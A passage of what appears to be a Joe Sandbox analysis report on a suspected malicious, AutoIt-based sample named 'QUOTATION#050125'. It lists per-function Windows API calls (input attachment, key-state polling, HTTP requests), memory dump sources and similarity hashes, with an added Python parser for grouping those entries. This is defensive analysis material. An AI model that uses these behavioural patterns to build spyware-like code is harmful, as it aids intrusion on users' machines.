• SetMenu.USER32(?,00000000), ref: 00153C88
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00153D10
• IsMenu.USER32(?), ref: 00153D24
• CreatePopupMenu.USER32 ref: 00153D2E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00153D5B
• DrawMenuBar.USER32 ref: 00153D63
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: 6772cbe6385cfe6006e3d71b71bc939022e5bd81208c55377085fe4f47a40b1a
• Instruction ID: 9f46a3dc4b3be3834a698d122e9fd438318998bec5941e9d471f1785ca7643af
• Opcode Fuzzy Hash: 6772cbe6385cfe6006e3d71b71bc939022e5bd81208c55377085fe4f47a40b1a
• Instruction Fuzzy Hash: 64415675A01309EFDB14CFA4D844BAA7BB5FF49391F140029ED66AB360D770AA54CF90
APIs
  • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00121F64
• GetDlgCtrlID.USER32 ref: 00121F6F
• GetParent.USER32 ref: 00121F8B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00121F8E
• GetDlgCtrlID.USER32(?), ref: 00121F97
• GetParent.USER32(?), ref: 00121FAB
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00121FAE
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172
• Opcode ID: aa8f7ef9871606c420abb98dfd607f8b6098e6ac083c8e1d4f139a7c1ee80cc8
• Instruction ID: 6b52fd3a0c6a7ee6e3caa7dad738c3022a4dc41338a2a09a1e30f5e4b449cef3
• Opcode Fuzzy Hash: aa8f7ef9871606c420abb98dfd607f8b6098e6ac083c8e1d4f139a7c1ee80cc8
• Instruction Fuzzy Hash: 7B21C270900224BFCF04EFA0DC85EEEBBB9EF19350B000119F961672D1DB345A68DBA0
APIs
  • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00122043
• GetDlgCtrlID.USER32 ref: 0012204E
• GetParent.USER32 ref: 0012206A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0012206D
• GetDlgCtrlID.USER32(?), ref: 00122076
• GetParent.USER32(?), ref: 0012208A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0012208D
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172
• Opcode ID: b75bbc703fe5a63fd9046756e3b5374410122494d61ff8033adf45b6b2fb05b0
• Instruction ID: 4ce01c5a52e68795f26b9edb8fc0bddad3bde46f4d12dfa3402c7b0f7c397894
• Opcode Fuzzy Hash: b75bbc703fe5a63fd9046756e3b5374410122494d61ff8033adf45b6b2fb05b0
• Instruction Fuzzy Hash: 5121C271A00214BFCF14AFA0DC85EEEBBB8EF15340F000415F951A72A1CB795A64DB64
APIs
• VariantInit.OLEAUT32(?), ref: 00143C5C
• CoInitialize.OLE32(00000000), ref: 00143C8A
• CoUninitialize.OLE32 ref: 00143C94
• GetRunningObjectTable.OLE32(00000000,?), ref: 00143DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00143ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00143F0E
• CoGetObject.OLE32(?,00000000,0015FB98,?), ref: 00143F2D
• SetErrorMode.KERNEL32(00000000), ref: 00143F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00143FC4
• VariantClear.OLEAUT32(?), ref: 00143FD8
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: 85be2c767c776b56c02f5d746bc9f2c1c05caf88e5439ccf48afb8b93c69f85e
• Instruction ID: bf9b1c57f587a15db3651fe17e555c5cfcb80080e9e6a9a1d19609d508ccd787
• Opcode Fuzzy Hash: 85be2c767c776b56c02f5d746bc9f2c1c05caf88e5439ccf48afb8b93c69f85e
• Instruction Fuzzy Hash: A9C123716083019FD700DF68C88496BB7E9FF89744F10491DF99A9B261D731EE46CB92
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00153A9D
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00153AA0
• GetWindowLongW.USER32(?,000000F0), ref: 00153AC7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00153AEA
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00153B62
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00153BAC
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00153BC7
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00153BE2
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00153BF6
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00153C13
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 268f5ab9cf9e56b9a3c2797d187ac24cb93fddb279d7ca1405e4db3bb1196884
• Instruction ID: 155fd9d9a430ba34d66c5c31a73d9773ebc8ebe6383cab2034a8a8e962f4848e
• Opcode Fuzzy Hash: 268f5ab9cf9e56b9a3c2797d187ac24cb93fddb279d7ca1405e4db3bb1196884
• Instruction Fuzzy Hash: 03617D75900248EFDB11DF68CC81EEE77B8EB09704F10019AFA25EB291C770AE85DB50
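The entries above are the report's own per-function API and similarity records; they are only useful at scale once they are structured. What follows is an added example, not part of the Joe Sandbox report and not Joe Sandbox code, that parses entries in this layout so a practitioner can list every function calling a given API, group functions that share an API String ID (the two ComboBox/ListBox entries above both carry 2573188126-1403004172), and pull out the Instruction Fuzzy Hash to compare against another report of the same family. The sample input is excerpted from the entries above; the record layout, the helper names, and the treatment of `Line %d (File "%s"):` as the interpreter's run-time error template are this example's assumptions.

```python
"""Parse per-function 'APIs' / 'Similarity' entries from a Joe Sandbox listing.
Added example, not Joe Sandbox code; record layout and helper names are assumed."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: three entries excerpted from the listing above (indentation,
# 'Download File' link labels and dump-source lines dropped; API lists shortened).
SAMPLE = """\
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001333CF
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001333F0
Similarity
• API ID: LoadString
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 2948472770-3080491070
• Instruction Fuzzy Hash: EA517C7290020ABADF15EBA0DD46EEEB778AF14340F204169F515720A2EB356F98DF61
APIs
  • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00121F64
• GetDlgCtrlID.USER32 ref: 00121F6F
• GetParent.USER32 ref: 00121F8B
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172
• Instruction Fuzzy Hash: 7B21C270900224BFCF04EFA0DC85EEEBBB9EF19350B000119F961672D1DB345A68DBA0
APIs
  • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00122043
• GetDlgCtrlID.USER32 ref: 0012204E
• GetParent.USER32 ref: 0012206A
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172
• Instruction Fuzzy Hash: 5121C271A00214BFCF14AFA0DC85EEEBBB8EF15340F000415F951A72A1CB795A64DB64
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                        # call-site address from the 'ref:' field
    subcall_of: int | None = None   # address of the callee when the line is a subcall

@dataclass
class Entry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)   # Similarity / dump-source fields

    def api_names(self) -> list[str]:
        """Direct API calls (subcall lines excluded), in the order the report lists them."""
        return [a.name for a in self.apis if a.subcall_of is None]

def parse_entries(text: str) -> list[Entry]:
    entries: list[Entry] = []
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":            # every function entry opens with this header
            entries.append(Entry())
            section = "APIs"
        elif stripped in SECTIONS:
            section = stripped
        elif entries and section == "APIs":
            if m := API_RE.match(line):
                entries[-1].apis.append(ApiCall(
                    m["name"], m["module"],
                    [a for a in (m["args"] or "").split(",") if a],
                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif entries and (m := KV_RE.match(line)):
            key, val = m["key"].strip(), m["val"].strip()
            entries[-1].meta[key] = val
            if key == "String ID":        # the report joins a function's strings with '$'
                entries[-1].strings = [s for s in val.split("$") if s]
    return entries

def callers_of(entries: list[Entry], api_name: str) -> list[Entry]:
    """Entries that call api_name directly, e.g. every AttachThreadInput site."""
    return [e for e in entries if api_name in e.api_names()]

def group_by(entries: list[Entry], key: str) -> dict[str, list[Entry]]:
    """Bucket entries by a Similarity field: 'API String ID' groups functions with the
    same API set and string set; 'Instruction Fuzzy Hash' can be compared with the
    same field in another report to locate the same function in another sample."""
    groups: dict[str, list[Entry]] = defaultdict(list)
    for e in entries:
        if key in e.meta:
            groups[e.meta[key]].append(e)
    return dict(groups)

# Run-time error template from the LoadString entry above; treating it as the AutoIt
# interpreter's own error format (runtime code, not payload) is this example's assumption.
AUTOIT_ERROR_TEMPLATE = 'Line %d (File "%s"):'

def is_interpreter_error_handler(e: Entry) -> bool:
    return AUTOIT_ERROR_TEMPLATE in e.strings

if __name__ == "__main__":
    for key, grp in group_by(parse_entries(SAMPLE), "API String ID").items():
        print(key, [f"{e.apis[0].ref:08X}" for e in grp])
```

Feed it the whole listing (after stripping the "Download File" link labels, as done above) rather than the excerpt, and `callers_of(entries, "AttachThreadInput")` or `callers_of(entries, "SetErrorMode")` give the call sites without scrolling; grouping by "Instruction Fuzzy Hash" across two reports of the same family is a quick way to see which functions are unchanged interpreter code and which differ.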
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0012B151
                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B165
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0012B16C
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B17B
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0012B18D
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1A6
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1B8
                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1FD
                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B212
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B21D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2156557900-0
                                                                                      • Opcode ID: ce6ce91d7e0a40c5bf98e1defffd55e89edd840974f165ba5ad9ac37fe9e1282
                                                                                      • Instruction ID: 1b4a304dbdd65811d61518f5bfa29920f329e0232cb87178a1fbf0754cbc6ab4
                                                                                      • Opcode Fuzzy Hash: ce6ce91d7e0a40c5bf98e1defffd55e89edd840974f165ba5ad9ac37fe9e1282
                                                                                      • Instruction Fuzzy Hash: FB319C75514314FFDB10DF24EC88B7EBBA9BB51312F144006FA11DA691D7B4AAA0CFA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                      • API String ID: 0-1603158881
                                                                                      • Opcode ID: 00c441e81a6089ce720a64ec8007df639cba6ee77662d1f387ecb5788f41c859
                                                                                      • Instruction ID: 247c8405862d2c4b2935202e5087541e389075fec99b45b63e3c799692ec0870
                                                                                      • Opcode Fuzzy Hash: 00c441e81a6089ce720a64ec8007df639cba6ee77662d1f387ecb5788f41c859
                                                                                      • Instruction Fuzzy Hash: F3E11632A00626ABCB18EF64D451BEDFBB1FF14710F15811AE466F7241DB34AFA58B90
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000C1459
                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 000C14F8
                                                                                      • UnregisterHotKey.USER32(?), ref: 000C16DD
                                                                                      • DestroyWindow.USER32(?), ref: 001024B9
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0010251E
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0010254B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                      • String ID: close all
                                                                                      • API String ID: 469580280-3243417748
                                                                                      • Opcode ID: 85060f79e860a94ffeb20f21aff0ceca2dc3c32463a8af684bebb5e5c33ab721
                                                                                      • Instruction ID: 69568ff0d45a32e05222bfa901ecd9196ce48dd209dfc150f9f58caf9732078f
                                                                                      • Opcode Fuzzy Hash: 85060f79e860a94ffeb20f21aff0ceca2dc3c32463a8af684bebb5e5c33ab721
                                                                                      • Instruction Fuzzy Hash: 0ED13B31601212CFCB29EF14C899FADF7A5BF05700F14429DE84A6B292DB71AD16CF94
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00137FAD
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00137FC1
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00137FEB
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00138005
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138017
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138060
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001380B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                      • String ID: *.*
                                                                                      • API String ID: 769691225-438819550
                                                                                      • Opcode ID: b9132fcdd8c59bf379050ecccee6bd3df56e83d242589ac147ec79e296d236e5
                                                                                      • Instruction ID: d3cfabf06bea43877c9611cab75aa950619295a45d52e43f727a5da45fda1ec4
                                                                                      • Opcode Fuzzy Hash: b9132fcdd8c59bf379050ecccee6bd3df56e83d242589ac147ec79e296d236e5
                                                                                      • Instruction Fuzzy Hash: A68180B15083459FCB34EF14C484AAEB3E8BB89310F544C6EF889D7291EB74DD498B52
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 000C5C7A
                                                                                        • Part of subcall function 000C5D0A: GetClientRect.USER32(?,?), ref: 000C5D30
                                                                                        • Part of subcall function 000C5D0A: GetWindowRect.USER32(?,?), ref: 000C5D71
                                                                                        • Part of subcall function 000C5D0A: ScreenToClient.USER32(?,?), ref: 000C5D99
                                                                                      • GetDC.USER32 ref: 001046F5
                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00104708
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00104716
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0010472B
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00104733
                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001047C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                      • String ID: U
                                                                                      • API String ID: 4009187628-3372436214
                                                                                      • Opcode ID: 4bd74b04e1735c21dde96b2305793324002a569f7d5696791369e657fce9907e
                                                                                      • Instruction ID: ed9c3d65080ecc21a18956f814609104b622abf71877b90327dd0a5af63a33c7
                                                                                      • Opcode Fuzzy Hash: 4bd74b04e1735c21dde96b2305793324002a569f7d5696791369e657fce9907e
                                                                                      • Instruction Fuzzy Hash: A971DCB5400205EFCF258F64C9C4AAE3BB1FF4A361F14426AEE955A2A6D3719881DF60
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001335E4
                                                                                      • LoadStringW.USER32(00192390,?,00000FFF,?), ref: 0013360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 2948472770-2391861430
                                                                                      • Opcode ID: 3b7ec523d79f5755990ef4b53d43a9439c3ca72e7a3c343481feeb2755afe3bb
                                                                                      • Instruction ID: 97258a77b6899eb3afcdadafcdfaf3260ebad47467ced5a418a91b5238550aae
                                                                                      • Opcode Fuzzy Hash: 3b7ec523d79f5755990ef4b53d43a9439c3ca72e7a3c343481feeb2755afe3bb
                                                                                      • Instruction Fuzzy Hash: 59518C7190020ABBDF14EBA0DC46EEEBB38EF14310F144129F515721A2EB311B99DFA5
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                        • Part of subcall function 000D912D: GetCursorPos.USER32(?), ref: 000D9141
                                                                                        • Part of subcall function 000D912D: ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00158B6B
                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00158B71
                                                                                      • ReleaseCapture.USER32 ref: 00158B77
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00158C12
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00158C25
                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00158CFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                      • API String ID: 1924731296-2107944366
                                                                                      • Opcode ID: b38d6892421a5d24d0aa3c35f73bc58b57898f942868aa8080e7c22483f45bdb
                                                                                      • Instruction ID: d9b6920e007288b702b2d5205acd091bc07601d3a0e58810d680bf453720384c
                                                                                      • Opcode Fuzzy Hash: b38d6892421a5d24d0aa3c35f73bc58b57898f942868aa8080e7c22483f45bdb
                                                                                      • Instruction Fuzzy Hash: 61516B71104304AFD704DF14D856FAE77E4FB88755F400A2DF9666B2E2DB709988CB62
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013C272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0013C29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0013C2CA
                                                                                      • GetLastError.KERNEL32 ref: 0013C322
                                                                                      • SetEvent.KERNEL32(?), ref: 0013C336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0013C341
                                                                                      Strings
